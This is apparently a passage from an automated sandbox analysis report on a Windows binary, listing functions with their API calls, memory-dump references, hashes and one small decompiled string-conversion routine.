                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$H_prolog3Leave$Enter$CharInitializeUpper
                                                                                                        • String ID:
                                                                                                        • API String ID: 2091688341-0
                                                                                                        • Opcode ID: b46a4ffbcefa837426d39634a4bc77a1db8b8b4d58924a15fcbc8a561b5d3f0a
                                                                                                        • Instruction ID: 1e69aa617de223fc617bd2d8ab6b25677be807872c46e10db52ea2b2cc141346
                                                                                                        • Opcode Fuzzy Hash: b46a4ffbcefa837426d39634a4bc77a1db8b8b4d58924a15fcbc8a561b5d3f0a
                                                                                                        • Instruction Fuzzy Hash: E821D335801205AADB11EBB8CD45BEDFBB4BF22314F14421EE422A72E1DB786F44D758
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004A2880, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004A2887
                                                                                                        • EnterCriticalSection.KERNEL32(?,00000004,004C5A03,?,00000002,?,00000000,0000042C), ref: 004A2895
                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000002,?,00000000,0000042C), ref: 004A28B0
                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004A290F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$Leave$EnterH_prolog3
                                                                                                        • String ID:
                                                                                                        • API String ID: 2873666866-0
                                                                                                        • Opcode ID: aeb7ca6cb3b5627948447ee11f55f6995e72046013aaeb7cbc31cfa4f9a6ccc0
                                                                                                        • Instruction ID: dbbd4bc630c5cef6c32fefb03738c3f9b631d074113d92f91c4ff0c48401bed5
                                                                                                        • Opcode Fuzzy Hash: aeb7ca6cb3b5627948447ee11f55f6995e72046013aaeb7cbc31cfa4f9a6ccc0
                                                                                                        • Instruction Fuzzy Hash: 0B11EC31E0420697E7316B2C8E0572EB764BBA2721F15071EF472A62D0CBBC5D417609
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004A291E, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004A2925
                                                                                                        • EnterCriticalSection.KERNEL32(?,00000004,004A2A44,000000FF,?,00000001,3B9ACA00,00781FF0,00000001,00000024,004F6410,@GATEWAY@), ref: 004A2933
                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004A294E
                                                                                                        • LeaveCriticalSection.KERNEL32(?,00000004), ref: 004A29AF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$Leave$EnterH_prolog3
                                                                                                        • String ID:
                                                                                                        • API String ID: 2873666866-0
                                                                                                        • Opcode ID: fab7442b0fb508b198781433c773ccff5c1ea5a07072cc8753d1979944dd2139
                                                                                                        • Instruction ID: 9493fe94d5cb17c39f28cebf53e62ab83799b8b87c0f5c052e7058186503f85b
                                                                                                        • Opcode Fuzzy Hash: fab7442b0fb508b198781433c773ccff5c1ea5a07072cc8753d1979944dd2139
                                                                                                        • Instruction Fuzzy Hash: A1112CB1F00202D7EB315F1CCE0576FB7A8BBA6B21F10451AE455A7390CBB85E41A709
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004A2AB5, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004A2ABC
                                                                                                        • EnterCriticalSection.KERNEL32(?,00000004,004DCD5C,00784028,00000001,00000000,?,00000001,00000001,?,?), ref: 004A2ACA
                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004A2AE5
                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004A2B34
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$Leave$EnterH_prolog3
                                                                                                        • String ID:
                                                                                                        • API String ID: 2873666866-0
                                                                                                        • Opcode ID: 3959e3cc9a3bc0fdb2820a7e11117c0819880b1d25c6d63fb3e111e6d003881c
                                                                                                        • Instruction ID: 7b243691d3346a8cff939f8a190051535b0a0705e5ac48a72c44950eb4b4ad62
                                                                                                        • Opcode Fuzzy Hash: 3959e3cc9a3bc0fdb2820a7e11117c0819880b1d25c6d63fb3e111e6d003881c
                                                                                                        • Instruction Fuzzy Hash: 2F01D630A0030287DF365F2C8A4537FB7A5BBA3311F10550AD462962A1CBBC6942F728
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098A7A0, Relevance: 6.0, APIs: 4, Instructions: 49memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 90%
                                                                                                        			E7098A7A0(short* _a4, signed int _a8, intOrPtr* _a12) {
				intOrPtr* _t11;
				char* _t12;
				int _t13;
				int _t17;
				short* _t18;

				_t18 = _a4;
				_t12 = 0;
				asm("sbb esi, esi");
				_t17 =  ~_a8 & 0x0000fde9;
				_t13 = WideCharToMultiByte(_t17, 0, _t18, 0xffffffff, 0, 0, 0, 0);
				if(_t13 > 0) {
					_t3 = _t13 + 1; // 0x1
					_t12 = HeapAlloc(GetProcessHeap(), 8, _t3);
					WideCharToMultiByte(_t17, 0, _t18, 0xffffffff, _t12, _t13, 0, 0);
					_t11 = _a12;
					if(_t11 != 0) {
						 *_t11 = _t13 - 1;
					}
				}
				return _t12;
			}








                                                                                                        0x7098a7a2
                                                                                                        0x7098a7ac
                                                                                                        0x7098a7b7
                                                                                                        0x7098a7ba
                                                                                                        0x7098a7c7
                                                                                                        0x7098a7cb
                                                                                                        0x7098a7cd
                                                                                                        0x7098a7e5
                                                                                                        0x7098a7ee
                                                                                                        0x7098a7f4
                                                                                                        0x7098a7fa
                                                                                                        0x7098a7fd
                                                                                                        0x7098a7fd
                                                                                                        0x7098a7fa
                                                                                                        0x7098a805

                                                                                                        APIs
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,77E34620,00000000,74B04F20,00000000,709832F5,00000000,00000000,00000000), ref: 7098A7C1
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000001), ref: 7098A7D3
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 7098A7DA
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 7098A7EE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharHeapMultiWide$AllocProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 1432973188-0
                                                                                                        • Opcode ID: 9f5e0a4ae91d781ee8aac9d3c3543a55619141ae4ca4d8889f87e6ff223a9f73
                                                                                                        • Instruction ID: 6b95c7b24cf81d042d2f113a72353c2cf4e5d95f8f63d42716a739c238f0d33e
                                                                                                        • Opcode Fuzzy Hash: 9f5e0a4ae91d781ee8aac9d3c3543a55619141ae4ca4d8889f87e6ff223a9f73
                                                                                                        • Instruction Fuzzy Hash: 43F0AFB76443197FE6004BAA8C84F27B7ACEB856B4F210236BA35D32D0DA70EC0556B1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 005430B4, Relevance: 6.0, APIs: 4, Instructions: 45threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,00000000,005406A9,00539730,00000001,00542E13,?,00000000,?,?,?,?,00542F25,?,0054292D), ref: 005430B6
                                                                                                          • Part of subcall function 00542F6D: TlsGetValue.KERNEL32(?,0054292D), ref: 00542F74
                                                                                                          • Part of subcall function 00542F6D: TlsSetValue.KERNEL32(00000000,0054292D), ref: 00542F95
                                                                                                        • __calloc_crt.LIBCMT ref: 005430D8
                                                                                                          • Part of subcall function 00540F7C: Sleep.KERNEL32(00000000), ref: 00540FA1
                                                                                                          • Part of subcall function 00542EDB: TlsGetValue.KERNEL32(00000000,00542F8B,?,0054292D), ref: 00542EE8
                                                                                                          • Part of subcall function 00542EDB: TlsGetValue.KERNEL32(00000005,?,0054292D), ref: 00542EFF
                                                                                                          • Part of subcall function 00542FF5: GetModuleHandleA.KERNEL32(KERNEL32.DLL,007D5B80,0000000C,00543106,00000000,00000000,?,00000000,005406A9,00539730,00000001,00542E13,?,00000000), ref: 00543006
                                                                                                          • Part of subcall function 00542FF5: GetProcAddress.KERNEL32(?,EncodePointer), ref: 0054303A
                                                                                                          • Part of subcall function 00542FF5: GetProcAddress.KERNEL32(?,DecodePointer), ref: 0054304A
                                                                                                          • Part of subcall function 00542FF5: InterlockedIncrement.KERNEL32(00810930), ref: 0054306C
                                                                                                          • Part of subcall function 00542FF5: __lock.LIBCMT ref: 00543074
                                                                                                          • Part of subcall function 00542FF5: ___addlocaleref.LIBCMT ref: 00543093
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00543108
                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000,005406A9,00539730,00000001,00542E13,?,00000000,?,?,?,?,00542F25,?,0054292D), ref: 00543120
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__lock
                                                                                                        • String ID:
                                                                                                        • API String ID: 2188371165-0
                                                                                                        • Opcode ID: 70d20761a6e45e7c7dcf764de62ee12b8d9712055aa74da76e9adab1d3e27f06
                                                                                                        • Instruction ID: 8c9bd9032edc723ec5a1734115c697f610c33a85ea35646c2feb52735e1e513e
                                                                                                        • Opcode Fuzzy Hash: 70d20761a6e45e7c7dcf764de62ee12b8d9712055aa74da76e9adab1d3e27f06
                                                                                                        • Instruction Fuzzy Hash: 72F028325042236BD7323778AC0F6DA3E64FF897B1F204219F514961E1DF25C942CAD4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004A1957, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004A195E
                                                                                                        • InitializeCriticalSection.KERNEL32(?,00000004,004C8906,' not found,00000000,?), ref: 004A1973
                                                                                                        • _strlen.LIBCMT ref: 004A198C
                                                                                                        • _mbstowcs.LIBCMT ref: 004A19A7
                                                                                                          • Part of subcall function 0053A4FD: __mbstowcs_l_helper.LIBCMT ref: 0053A51B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CriticalH_prolog3InitializeSection__mbstowcs_l_helper_mbstowcs_strlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 4276943295-0
                                                                                                        • Opcode ID: 390cc4df3c3476696b61d25a10f102860e9ad04424757575fd91d3bb8d0f056d
                                                                                                        • Instruction ID: 3ac07268216910a4535ea5e05e968f667f3b62dd9118136c005e3060a1736e2e
                                                                                                        • Opcode Fuzzy Hash: 390cc4df3c3476696b61d25a10f102860e9ad04424757575fd91d3bb8d0f056d
                                                                                                        • Instruction Fuzzy Hash: 7FF0F671801607AFDB11EF20C8097AEBF71BF41322F008216F5548B391CB748A14DBD5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004A1E9D, Relevance: 6.0, APIs: 4, Instructions: 24COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004A1EA4
                                                                                                        • EnterCriticalSection.KERNEL32(?,00000004,004A278C,00000000,00000000,?,00000000,?), ref: 004A1EB2
                                                                                                        • CharUpperW.USER32(00000000), ref: 004A1EC9
                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004A1EDC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$CharEnterH_prolog3LeaveUpper
                                                                                                        • String ID:
                                                                                                        • API String ID: 1896594325-0
                                                                                                        • Opcode ID: 8e349b288a532da59d8b385b80b7e946c37ed6b0345ee9de98053a880a4fe9fd
                                                                                                        • Instruction ID: 6c1a3e13f600a7a271a411e7ce782a00cf0e39d45851ab36eb2323ac4d8e98b1
                                                                                                        • Opcode Fuzzy Hash: 8e349b288a532da59d8b385b80b7e946c37ed6b0345ee9de98053a880a4fe9fd
                                                                                                        • Instruction Fuzzy Hash: 6BE06531900201DBEB319F75C80D76FFBB4BF41712F10851DE2A1961A0CF785A40CB14
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00502D4B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00502D52
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                          • Part of subcall function 004E9D17: __EH_prolog3.LIBCMT ref: 004E9D1E
                                                                                                          • Part of subcall function 004B982C: __EH_prolog3.LIBCMT ref: 004B9833
                                                                                                        • Sleep.KERNEL32(000000C8), ref: 00502E23
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CriticalSection$DeleteInitializeSleep
                                                                                                        • String ID: WaitingThread
                                                                                                        • API String ID: 945124508-3770664344
                                                                                                        • Opcode ID: 21a307c12c53b798784b00d281345b6517c45d3a0fd2701dc846e29e6f23b4bf
                                                                                                        • Instruction ID: d07ded0994ab6c818880e8840be06926ac967273f50d43034a2599314d5795f1
                                                                                                        • Opcode Fuzzy Hash: 21a307c12c53b798784b00d281345b6517c45d3a0fd2701dc846e29e6f23b4bf
                                                                                                        • Instruction Fuzzy Hash: AD41D371A84705AAEF30EBA4C89AB7E7EE9BF50700F10492EF186D72D0DB709D848714
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004BF1C2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004BF1C9
                                                                                                          • Part of subcall function 004A2712: __EH_prolog3.LIBCMT ref: 004A2719
                                                                                                          • Part of subcall function 004A2712: EnterCriticalSection.KERNEL32(?,0000004C,004A2A1B,00781FF0,00000001,00000024,004F6410,@GATEWAY@), ref: 004A2727
                                                                                                          • Part of subcall function 004A2712: LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,00000000,?), ref: 004A27DE
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 004A2DA5: __EH_prolog3.LIBCMT ref: 004A2DAC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
